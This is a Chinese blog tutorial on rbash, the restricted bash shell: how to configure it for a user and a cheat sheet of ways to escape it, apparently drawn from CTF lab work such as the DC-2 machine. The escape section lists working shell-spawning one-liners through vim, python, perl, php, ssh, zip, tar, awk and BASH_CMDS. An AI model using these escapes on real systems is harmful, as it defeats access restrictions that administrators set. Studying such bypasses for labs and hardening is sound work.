rbash限制以及绕过

最新推荐文章于 2024-09-30 08:47:41 发布
最新推荐文章于 2024-09-30 08:47:41 发布
阅读量918 收藏 10
点赞数 1
分类专栏: Linux系统 文章标签: bash linux 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60848021/article/details/130041922
版权
rbash是受限的bashshell,用于限制用户执行特定命令。设置rbash涉及复制bash并设置用户shell。绕过rbash限制的方法包括枚举系统信息、利用允许的命令和编程语言执行系统命令,如python、php、perl等。此外,还可以通过ssh、tar、zip等工具寻找执行新shell的机会。
摘要由CSDN通过智能技术生成

目录

一,什么是rbash?

二,如何设置rbash?

三,如何绕过rbash限制?

一,什么是rbash?

        rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一个软链接)。它与一般shell的区别在于会限制一些行为,让一些命令无法执行。

二,如何设置rbash?

1,复制一个bash,重命名为rbash

        cp  /bin/bash  /bin/rbash

2,设置用户tom登陆的shell为rbash

        useradd -s  /bin/rbash  tom

3,  在tom用户下新建一个.bin目录存放可以执行的命令

        mkdir -p  /home/tom/.bin

4,  通过软连接执行命令

        ln -s  /bin/clear  /home/$tom/.bin/clear

5,  编辑文件/home/$tom/.bashrc,添加export PATH=$HOME/.bin/.
文件一定要以# .bashrc为首行.

三,如何绕过rbash限制?

1,首先是枚举Linux环境(做信息收集)

 1,检查可用的命令:su,cd,ls等

 2,检查可用的操作符:< > <<  >>  |  /等

 3,root身份可以运行的命令:sudo -l

 4,检查shell:echo $SHELL

 5,检查可用的编程语言:python,php,ruby,perl等

 6,检查环境变量:运行env或者printenv

2,"/"字符被允许

3,cp命令被允许

 

4,常见应用

     FTP: ftp > !/bin/sh 

     GDB:gdb > !/bin/sh

     man:man > !/bin/sh

     git:git > git help status

     vi/vim:!/bin/sh 或者 !/bin/bash

5,set   shell

# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
:shell

# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

6,编程语言

python
python -c "import os;os.system('/bin/bash')"
或者
python -c "import pty;pty.spawn('/bin/bash')"


php
php -a then exec("sh -i")


perl
perl -e "exec '/bin/sh';"


lua
os.execute('/bin/sh')


ruby
exec "/bin/sh"

7,其他方法

ssh(4种形式):

ssh username@IP -t "/bin/sh" or "/bin/bash"

ssh username@IP -t "bash --noprofile"

ssh username@IP -t "() { :; }; /bin/bash" (sehllshock)

ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)


zip
zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

tar
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

awk
awk 'BEGIN {system("/bin/bash")}' 

DC2靶机所使用的方法:

# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a 

# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

一条贤鱼的学习站
关注
专栏目录
rbash绕过方法总结(精)
墨痕诉清风的博客
05-11 912
枚举 Linux 环境 1) First we must to check for available commands like cd/ls/echo etc. 2) We must to check for operators like >,>>,<,|. 3) We need to check for available programming languages like perl,ruby,python etc. 4) Which commands we can run
红队内网攻防渗透:内网渗透之Linux内网权限提升技术:LXD&Docker&Rbash限制bash
HACKONE的博客
06-15 229
Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。Docker提供了一个容器镜像的集装箱模型,使得容器可以在不同的环境中进行移植和部署。而Docker是基于LXC的容器化平台,提供了一套简化容器构建、分发和运行的工具和API。LXD是基于LXC容器的管理程序,当前用户可操作容器,理解为用户创建一个容器,再用容器挂载宿主机磁盘,LXD、LXC 和 Docker 是三种不同的容器化技术,它们在实现和使用上有一些区别。
rbash绕过
weixin_43705814的博客
12-29 3386
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进行限制呢,有以下几个原因: 1.提高安全性,防止黑客和渗透测试人员的入侵 2.限制一些会对系统造成危害的危险命令 3.为了提高渗透测试人员的个人能力,在一些靶机上设置受限的shell让测试人员绕过拿flag 二、常见的绕过方法 2.
[2] rbash绕过
最新发布
qq_45776114的博客
09-30 280
rbash是 “restricted bash” 的缩写,指的是一种受限的 Bash shell。它是一种特别的 Bash shell 变体,旨在限制用户在终端中的某些操作,增加系统的安全性。使用rbash的主要目的是为了限制用户的能力,防止他们执行某些潜在的危险命令。rbash限制用户只能运行在$PATH环境变量中定义的程序设置rbash验证是否设置成功:下面这是成功的结果。
Rbash绕过
weixin_54252904的博客
04-17 562
Rbash VI绕过 vi:set shell=/bin/sh 运行shell:shell export PATH=/usr/sbin:/usr/bin:/sbin:/bin CP绕过 cp 环境变量绕过 BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量` export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出 export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导
靶机DC-2练习:通过rbash绕过获取shell,使用git命令提权
7Riven's blog
12-24 1865
1.主机发现 靶机IP地址:192.168.109.163 2.扫描目标服务版本 3.发现80端口,访问主页 访问失败 很显然,本地不解析该域名,在/etc/hosts文件中添加即可 再次刷新网页 单击首页左下角 发现flag1:出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息,接下来扫描一下后台目录 4.工具扫描后台目...
linux限制用户可用命令,如何使用rbash限制用户访问Linux系统指定命令 互联网技术圈 互联网技术圈...
06-01
可以使用 rbash(restricted bash)来限制用户访问 Linux 系统指定...需要注意的是,这种限制方式并不是绝对安全的,因为用户仍然可以使用一些 trick 来绕过限制。但是,对于一般的用户来说,这种限制方式已经足够了。
DC-2 详解其中限制shell的绕过
jelly
06-21 613
靶机:DC-2 192.168.56.103 攻击机:Kali 192.168.56.1 今天就来挑战DC-2了,我也是看网上的教程才过的这关,不过其中很多过程都有自己的理解和思路。这篇笔记主要用于个人学习笔记。如果有不对之处,很欢迎大佬们教我。 探寻靶机 使用nmap先把DC-2找出来 然后具体探测开放端口,这里是默认探测常开放的1000个端口 找到80端口,在浏览器输入http://192.168.56.103发现不能连接,而且url处地址自动跳转为http://dc-2 ...
过受限制的/bin/bash-rbash(vi法和PATH法)
qq_45290991的博客
08-07 608
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进...
rbash绕过及提权
qq_45654333的博客
09-18 479
1,复制一个bash,重命名为rbash2,设置用户tom登陆的shell为rbash3, 在tom用户下新建一个.bin目录存放可以执行的命令4, 通过软连接执行命令5, 编辑文件/home/$tom/.bashrc,添加export PATH=$HOME/.bin/.文件一定要以# .bashrc为首行.
rbash
CODER的博客
04-19 2693
1.r意味着restrict 2.使用BASH_CMDS[a]=/bin/sh;a 3. $ export PATH=$PATH:/bin/ $ export PATH=$PATH:/usr/bin 4. echo /*查看文件 5. 自己使用命令吧 https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html...
权限提升-Linux系统权限提升篇&Vulnhub&Rbash绕过&Docker&LXD容器&History泄漏&shell交互
siu~
04-03 1563
1、普通用户到Linux-泄漏-History 2、普通用户到Linux-限制-Rbash绕过 3、普通用户到Linux-容器-LXD&Docker 4.Linux系统提权-web/普通用户-docker逃逸&提权&shell交互 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
CTF writeup: rbash 逃脱方法
samohyes的博客
08-03 2346
今天做了一个rbash逃脱的题目。百度了好久没找到,后来翻墙用了google才找到思路,大致的思路是这位外国友人贡献的。 https://eddy3oy.com/2017/02/28/breaking-out-of-rbash/ 好了,我来说下我的解题过程。 首先,我开始尝试出来可以用echo命令,但是不知道有什么用,其实采用compgen -c就可以知道能用什么命令。 那么输入 echo
DC-2 靶机实战------rbash绕过、git提权、WPScan的使用
z2560088的博客
09-25 347
安装DC-2 网卡开启NAT模式 开始攻击 攻击机kali (192.168.160.0/24)使用wpscan、cewl、hydra、dirb、nmap等工具 信息搜集 nmap -sP 192.168.160.0/24 确定DC-2 IP 192.168.160.140 扫描具体开放的端口 nmap -sV 192.168.160.140 -p- -A 得知SSH开放和http开放,访问http://192.168.160.140 发现ip重定向有问题需.
rbash逃逸
leoriclee的博客
07-02 578
枚举Linux环境 枚举是本文中最重要的内容。我们需要通过枚举Linux环境来考察可以绕过rbash做哪些事情。 我们需要枚举: 1)首先,我们必须检查有哪些可用的命令,如cd / ls / echo等。 2)我们必须检查诸如>、>>、<、|之类的操作符。 3)我们需要检查可用的编程语言,如perl、ruby、python等。 4)我们能够以root身份运行哪些命令(sudo -l)。 5)检查具有SUID权限的文件或命令。 6)必须检查当前所用的shell,具体命令为:echo $
rbash限制用户执行的命令
weixin_30892763的博客
06-22 683
rbash限制用户执行的命令 软连接 sudo ln -s /bin/bash /bin/rbash sudo bash -c 'echo "/bin/rbash" >> /etc/shells' sudo chsh -s /bin/rbash $ruser 建一个直接使用/bin/rbash的用户 useradd -s /bin/rbash $ruser ruser是需要限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值